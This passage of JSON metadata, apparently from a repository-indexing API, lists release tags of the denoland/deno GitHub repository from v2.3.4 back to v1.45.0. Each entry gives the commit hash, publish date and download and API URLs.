tHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378ea